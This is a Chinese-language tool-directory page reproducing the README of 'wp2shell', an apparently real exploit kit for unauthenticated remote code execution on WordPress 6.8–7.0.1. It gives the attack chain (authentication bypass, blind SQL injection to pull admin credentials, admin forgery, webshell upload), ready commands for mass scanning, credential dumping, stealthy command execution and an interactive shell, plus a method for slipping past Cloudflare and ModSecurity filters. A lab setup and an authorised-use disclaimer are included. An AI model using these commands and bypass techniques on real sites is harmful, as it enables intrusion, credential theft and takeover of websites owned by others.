Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
wp2shell-Exploit-Waf-Bypass — WordPress 预认证 RCE 漏洞利用 + 扫描器 + WAF 绕过 | CVE-2026-63030 + CVE-2026-60137 | Go + Python + Metasploit 模块 + Docker 实验环境 | Kitploit
工具/GitHubGitHub/m4xsec/wp2shell-exploit-waf-bypass
Web漏洞扫描器漏洞利用Web应用程序漏洞利用API安全测试WAF绕过渗透测试红队
GitHubm4xsec/wp2shell-exploit-waf-bypass

wp2shell-Exploit-Waf-Bypass

WordPress 预认证 RCE 漏洞利用 + 扫描器 + WAF 绕过 | CVE-2026-63030 + CVE-2026-60137 | Go + Python + Metasploit 模块 + Docker 实验环境

查看仓库
2271个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
                ___      __         ____
 _      _____  |__ \ ___/ /_  ___  / / /
| | /| / / _ \ __/ // __/ __ \/ _ \/ / / 
| |/ |/ /  __// __//_  / / / /  __/ / /  
|__/|__/\___//____//__/_/ /_/\___/_/_/   
                                         
  WordPress 未认证 RCE — CVE-2026-63030 + CVE-2026-60137
  作者:Venexy (M4xSec)

GitHub Release License: MIT Go Metasploit

对 WordPress 6.8.0–6.8.5、6.9.0–6.9.4、7.0.0–7.0.1 的未认证远程代码执行。已在 6.8.6、6.9.5、7.0.2 中修复。

快速安装

# 预编译二进制文件(最快)
curl -sL https://github.com/M4xSec/wp2shell-Exploit-Waf-Bypass/releases/download/v1.0.0/wp2shell-linux-amd64 -o wp2shell && chmod +x wp2shell

# 或从源码构建
go build -o wp2shell go-scanner/wp2shell-master.go

攻击链

  1. 通过嵌套批量请求中的路由混淆,利用无效的 primer 路径绕过身份验证
  2. 基于时间的盲 SQLi 提取表前缀、管理员 ID 和凭据
  3. 基于 UNION 的行伪造填充 oEmbed 缓存(只读 SQLi → 数据库写入)
  4. 变更集提权 + 可重入的 parse_request() 伪造管理员
  5. 插件上传部署自清理 WebShell
  6. 命令执行与自动清理

工具

Go 扫描器(go-scanner/wp2shell-master.go)

一体化二进制程序 — 扫描、检测、读取、利用、交互式 Shell。

go build -o wp2shell-master go-scanner/wp2shell-master.go

# 批量扫描
./wp2shell-master scan -f targets.txt -j -t 20

# 确认 SQLi
./wp2shell-master check https://target.com --waf --delay 3.0

# 提取管理员凭据
./wp2shell-master read https://target.com --preset users

# 未认证 RCE(无需密码)
./wp2shell-master rce https://target.com --cmd id -y --waf --stealth

# 交互式 Shell
./wp2shell-master rce https://target.com -i -y

WAF 绕过工具(waf-bypass/)

通过 JSON Unicode 转义 SQL 关键字来实现 Cloudflare/ModSecurity 绕过的独立脚本。

  • core.py — 带 WAF 绕过的共享盲 SQLi 引擎
  • dump_version.py — 提取 @@version
  • dump_dbname.py — 提取 DATABASE()
  • dump_tables.py — 枚举数据表
  • dump_columns.py — 枚举列
  • rce_shell.py — 带 WAF 绕过的完整 RCE 链

Metasploit 模块(metasploit-modules/)

  • wp2shell_rce.rb — 完整 RCE 漏洞利用模块(PR #21760)
  • wp2shell_scanner.rb — 非破坏性扫描器(PR #21761)

本地安装:

mkdir -p ~/.msf4/modules/exploits/multi/http
mkdir -p ~/.msf4/modules/auxiliary/scanner/http
cp metasploit-modules/wp2shell_rce.rb ~/.msf4/modules/exploits/multi/http/wp_wordpress_batch_rce.rb
cp metasploit-modules/wp2shell_scanner.rb ~/.msf4/modules/auxiliary/scanner/http/wp_wordpress_batch_sqli.rb

WAF 绕过技术

Cloudflare WAF 会检查原始 JSON 字节,但不会在模式匹配前解码 \uXXXX 转义序列。WordPress 的 PHP json_decode() 会透明地解码这些序列。

  • SLEEP → SLEEP — 绕过关键字检测
  • 冒号 primer(以 : 代替 http://:)— 更短,避免 URI 模式规则
  • /wp-json/batch/v1 固定链接路径 — 避免 ?rest_route= 被拦截
  • 来自目标域的 Origin + Referer 请求头 — 满足 CORS/同源检查

Docker 实验环境

无 WAF 实验环境(端口 8888)

cd lab
docker compose up -d --build
# WordPress 6.9.0 位于 http://localhost:8888
# 管理员:admin / Summer2026!

WAF 实验环境(端口 9999)

带 Cloudflare 风格规则的 ModSecurity CRS(OWASP)— 已确认 Unicode 绕过有效。

cd lab/waf
docker compose up -d --build
# WAF 后的 WordPress:http://localhost:9999

免责声明

此工具仅用于授权的安全测试。只能针对您拥有或已获得明确书面许可的系统进行测试。未经授权的访问是违法的。

许可证

MIT

下载工具